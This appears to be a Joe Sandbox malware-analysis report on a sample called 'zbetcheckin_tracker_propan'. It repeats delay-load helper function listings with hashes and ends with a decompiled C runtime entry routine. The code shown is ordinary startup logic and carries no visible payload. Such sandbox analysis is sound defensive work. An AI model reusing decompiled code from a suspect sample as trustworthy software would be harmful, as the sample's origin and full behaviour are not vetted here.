Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: 15e1797f4050d2f757d0ad6f836f2fbe290bd14c74dcc157cf584a7b2143a2d3
Instruction ID: a63b08ee784cbde66fbb06cc9f88484844354851e813345f88bdbd62d15ab23f
Opcode Fuzzy Hash: 15e1797f4050d2f757d0ad6f836f2fbe290bd14c74dcc157cf584a7b2143a2d3
Instruction Fuzzy Hash: 86A001966BE542FC3148626A6E0AC3B022DC5C5BA17B0895FF80684391A8C06DA69432

Function 002D8B25, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D8B03

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: a32cbe9725e0bd26275476f0a529cbef2e688beef3ebce537fbb3e407a4807b7
Instruction ID: e451197de2f7dda933ed13ce4341d696ea0a56eec5846a4d52a46feb8683a5fd
Opcode Fuzzy Hash: a32cbe9725e0bd26275476f0a529cbef2e688beef3ebce537fbb3e407a4807b7
Instruction Fuzzy Hash: 81A001962BA902BC710862526E0AC3B022CC5C6B61331891FF942C4391ACC12C6A9436

Function 002D9224, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D91EE

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: a4456afe367ea0059b8248b7b371106758c33009ab3367d327d5bcebe8f109b9
Instruction ID: a63b08ee784cbde66fbb06cc9f88484844354851e813345f88bdbd62d15ab23f
Opcode Fuzzy Hash: a4456afe367ea0059b8248b7b371106758c33009ab3367d327d5bcebe8f109b9
Instruction Fuzzy Hash: 86A001966BE542FC3148626A6E0AC3B022DC5C5BA17B0895FF80684391A8C06DA69432

Function 002D9206, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D91EE

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: 029d4b1a356b2d96f3e42eec435ee491234ace2f67ff70faee3ad19f72fb2b30
Instruction ID: a63b08ee784cbde66fbb06cc9f88484844354851e813345f88bdbd62d15ab23f
Opcode Fuzzy Hash: 029d4b1a356b2d96f3e42eec435ee491234ace2f67ff70faee3ad19f72fb2b30
Instruction Fuzzy Hash: 86A001966BE542FC3148626A6E0AC3B022DC5C5BA17B0895FF80684391A8C06DA69432

Function 002D8B1B, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D8B03

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: d7d00b1626190d8c1e9e2cbaa98bcd63b32229933cfc42eda6cb7f2653eb2557
Instruction ID: e451197de2f7dda933ed13ce4341d696ea0a56eec5846a4d52a46feb8683a5fd
Opcode Fuzzy Hash: d7d00b1626190d8c1e9e2cbaa98bcd63b32229933cfc42eda6cb7f2653eb2557
Instruction Fuzzy Hash: 81A001962BA902BC710862526E0AC3B022CC5C6B61331891FF942C4391ACC12C6A9436

Function 002D921A, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D91EE

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: c09971676b397e555c6cfb2639ebf0795ab8f94d57ad3b535ee41ca40eae691c
Instruction ID: a63b08ee784cbde66fbb06cc9f88484844354851e813345f88bdbd62d15ab23f
Opcode Fuzzy Hash: c09971676b397e555c6cfb2639ebf0795ab8f94d57ad3b535ee41ca40eae691c
Instruction Fuzzy Hash: 86A001966BE542FC3148626A6E0AC3B022DC5C5BA17B0895FF80684391A8C06DA69432

Function 002D8B11, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D8B03

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: c0754243ac0d2bfc2dc1229629f71bf7dba54ea6e76eba3c4468230c8012a48d
Instruction ID: e451197de2f7dda933ed13ce4341d696ea0a56eec5846a4d52a46feb8683a5fd
Opcode Fuzzy Hash: c0754243ac0d2bfc2dc1229629f71bf7dba54ea6e76eba3c4468230c8012a48d
Instruction Fuzzy Hash: 81A001962BA902BC710862526E0AC3B022CC5C6B61331891FF942C4391ACC12C6A9436

Function 002D9210, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D91EE

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: f568f0c93e81694651aeeffcda5ff00ca06187ec5d1572f8587aee3ff8a5c14b
Instruction ID: a63b08ee784cbde66fbb06cc9f88484844354851e813345f88bdbd62d15ab23f
Opcode Fuzzy Hash: f568f0c93e81694651aeeffcda5ff00ca06187ec5d1572f8587aee3ff8a5c14b
Instruction Fuzzy Hash: 86A001966BE542FC3148626A6E0AC3B022DC5C5BA17B0895FF80684391A8C06DA69432

Function 002D8AB3, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D8AC0

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: 76c26cb1d6e79ac60315d955688b02f63a3d2b90a0e78c532f730ade256a2d8a
Instruction ID: 5e70ccba1fdb92b0b43ce2b70833c0eff394bed0fab80c2a971d8471ba215f2f
Opcode Fuzzy Hash: 76c26cb1d6e79ac60315d955688b02f63a3d2b90a0e78c532f730ade256a2d8a
Instruction Fuzzy Hash: C5A001A66BA505BC3108A2966E0AC3B121CC5D2B62330851FFC02D9391AC912C669532

Function 002D8AEC, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D8AC0

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: 63ad11a56ea6014ffd6d5e2579c2eddfa40b42ccf47f69563f2dc0e22ca1654e
Instruction ID: 09d52f305f04874c69d39c1de288d9a156a16f9981be09de28995e69aa1f87e4
Opcode Fuzzy Hash: 63ad11a56ea6014ffd6d5e2579c2eddfa40b42ccf47f69563f2dc0e22ca1654e
Instruction Fuzzy Hash: 32A001962BE506FC310862966E0AC3B121CC5C6BA1330891FF802C9391AC912C669532

Function 002D91E1, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D91EE

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: 803f42b275ea04527033e0a4e6e6a9e3db7977224ae1cb03b8f95e52dbb0e2cf
Instruction ID: 4b3855cd2639c76e23c1f15104c00c8ca1dcc84a9627e7b7666da124b4e1424d
Opcode Fuzzy Hash: 803f42b275ea04527033e0a4e6e6a9e3db7977224ae1cb03b8f95e52dbb0e2cf
Instruction Fuzzy Hash: 4DA01182ABA002BC3008222A2E0AC3B022CC0C0BA03B0800FF80080380A8C02CA28032

Function 002D8AE2, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D8AC0

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: 1e6a4bf776b83db4d862c3a2a685f5d753cccc0a1543d1c60257d944bf5d618f
Instruction ID: 09d52f305f04874c69d39c1de288d9a156a16f9981be09de28995e69aa1f87e4
Opcode Fuzzy Hash: 1e6a4bf776b83db4d862c3a2a685f5d753cccc0a1543d1c60257d944bf5d618f
Instruction Fuzzy Hash: 32A001962BE506FC310862966E0AC3B121CC5C6BA1330891FF802C9391AC912C669532

Function 002D8AF6, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D8B03

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: 5680dd16d6ab4a663cc64d8e11742b703ea51b15d98a7f1509655671336015a7
Instruction ID: 65ac945daec855dcc2468380a6be0a24e06623c19d1e401a61216e8afd8c701d
Opcode Fuzzy Hash: 5680dd16d6ab4a663cc64d8e11742b703ea51b15d98a7f1509655671336015a7
Instruction Fuzzy Hash: 6DA001962BA902BC7108A2526E1AC3B022CC5C2B21331891FF941D4391ACC12C6A9436

Function 0040CA12, Relevance: 1.5, APIs: 1, Instructions: 2

C-Code - Quality: 76%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t30;
				signed int _t40;
				signed int _t41;
				signed int _t43;
				CHAR* _t44;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				signed int _t68;
				void* _t69;
				void* _t70;
				signed int _t71;
				long _t74;
				signed int _t78;
				struct _OSVERSIONINFOA* _t80;
				long _t81;
				void* _t82;

				E0040FD83(); // executed
				_push(0x60);
				_push(0x418c10);
				E0040D48C(__ebx, __edi, __esi);
				 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
				GetStartupInfoA(_t82 - 0x70);
				 *(_t82 - 4) = 0xfffffffe;
				_t80 = HeapAlloc(GetProcessHeap(), 0, 0x94);
				if(_t80 != 0) {
					_t80->dwOSVersionInfoSize = 0x94;
					_t30 = GetVersionExA(_t80); // executed
					_push(_t80);
					_push(0);
					__eflags = _t30;
					if(_t30 != 0) {
						 *(_t82 - 0x20) = _t80->dwPlatformId;
						 *(_t82 - 0x24) = _t80->dwMajorVersion;
						 *(_t82 - 0x28) = _t80->dwMinorVersion;
						_t78 = _t80->dwBuildNumber & 0x00007fff;
						HeapFree(GetProcessHeap(), ??, ??);
						_t81 =  *(_t82 - 0x20);
						__eflags = _t81 - 2;
						if(_t81 != 2) {
							_t78 = _t78 | 0x00008000;
							__eflags = _t78;
						}
						_t68 =  *(_t82 - 0x24);
						_t74 =  *(_t82 - 0x28);
						 *0x43607c = _t81;
						 *0x436084 = (_t68 << 8) + _t74;
						 *0x436088 = _t68;
						 *0x43608c = _t74;
						 *0x436080 = _t78;
						 *(_t82 - 0x20) = E0040C7F1((_t68 << 8) + _t74);
						_t40 = E0040ED3B(1, _t74, _t78, 1);
						_pop(_t69);
						__eflags = _t40;
						if(_t40 == 0) {
							E0040C7CD(_t40, _t81);
							_t69 = 0x1c;
						}
						_t41 = E0040FBFF(1);
						__eflags = _t41;
						if(_t41 == 0) {
							E0040C7CD(_t41, _t81);
							_t69 = 0x10;
						}
						E0040F808();
						 *(_t82 - 4) = 1;
						_t43 = E0040F5C8(1, _t74, _t78, _t81, __eflags);
						__eflags = _t43;
						if(_t43 < 0) {
							E0040CDF0(_t74, 0x1b);
							_pop(_t69); // executed
						}
						_t44 = GetCommandLineA(); // executed
						 *0x436c14 = _t44;
						 *0x436068 = E0040F493(); // executed
						_t46 = E0040F3DA(_t69); // executed
						__eflags = _t46;
						if(_t46 < 0) {
							E0040CDF0(_t74, 8);
							_pop(_t69);
						}
						_t47 = E0040F167(_t69, _t74);
						__eflags = _t47;
						if(_t47 < 0) {
							E0040CDF0(_t74, 9);
						}
						_t48 = E0040CF0C(1, _t78, _t81, _t82, 1);
						_pop(_t70);
						__eflags = _t48;
						if(_t48 != 0) {
							E0040CDF0(_t74, _t48);
							_pop(_t70);
						}
						_t49 = E0040F10A(_t70);
						__eflags =  *(_t82 - 0x44) & 1;
						if(__eflags == 0) {
							_t71 = 0xa;
						} else {
							_t71 =  *(_t82 - 0x40) & 0x0000ffff;
						}
						_t50 = E00408C00(__eflags, 0x400000, 0, _t49, _t71); // executed
						 *((intOrPtr*)(_t82 - 0x1c)) = _t50;
						__eflags =  *(_t82 - 0x20);
						if( *(_t82 - 0x20) == 0) {
							E0040D06C(_t50);
						}
						E0040D08E();
						 *(_t82 - 4) = 0xfffffffe;
						_t52 =  *((intOrPtr*)(_t82 - 0x1c));
					} else {
						HeapFree(GetProcessHeap(), ??, ??);
						goto L26;
					}
				} else {
					_push(0x12);
					E0040C7CD(_t29, _t80);
					L26:
					_t52 = 0xff;
				}
				return E0040D4D1(_t52);
			}

0x0040ca12
0x0040c832
0x0040c834
0x0040c839
0x0040c83e
0x0040c846
0x0040c84c
0x0040c86a
0x0040c86e
0x0040c87d
0x0040c880
0x0040c886
0x0040c887
0x0040c889
0x0040c88b
0x0040c89e
0x0040c8a4
0x0040c8aa
0x0040c8b0
0x0040c8b9
0x0040c8bf
0x0040c8c2
0x0040c8c5
0x0040c8c7
0x0040c8c7
0x0040c8c7
0x0040c8cd
0x0040c8d5
0x0040c8da
0x0040c8e0
0x0040c8e5
0x0040c8eb
0x0040c8f1
0x0040c8fc
0x0040c903
0x0040c908
0x0040c909
0x0040c90b
0x0040c90f
0x0040c914
0x0040c914
0x0040c915
0x0040c91a
0x0040c91c
0x0040c920
0x0040c925
0x0040c925
0x0040c926
0x0040c92b
0x0040c92e
0x0040c933
0x0040c935
0x0040c939
0x0040c93e
0x0040c93e
0x0040c93f
0x0040c945
0x0040c94f
0x0040c954
0x0040c959
0x0040c95b
0x0040c95f
0x0040c964
0x0040c964
0x0040c965
0x0040c96a
0x0040c96c
0x0040c970
0x0040c975
0x0040c977
0x0040c97c
0x0040c97d
0x0040c97f
0x0040c982
0x0040c987
0x0040c987
0x0040c988
0x0040c98d
0x0040c990
0x0040c99a
0x0040c992
0x0040c992
0x0040c992
0x0040c9a4
0x0040c9a9
0x0040c9ac
0x0040c9b0
0x0040c9b3
0x0040c9b3
0x0040c9b8
0x0040c9ed
0x0040c9f4
0x0040c88d
0x0040c890
0x00000000
0x0040c890
0x0040c870
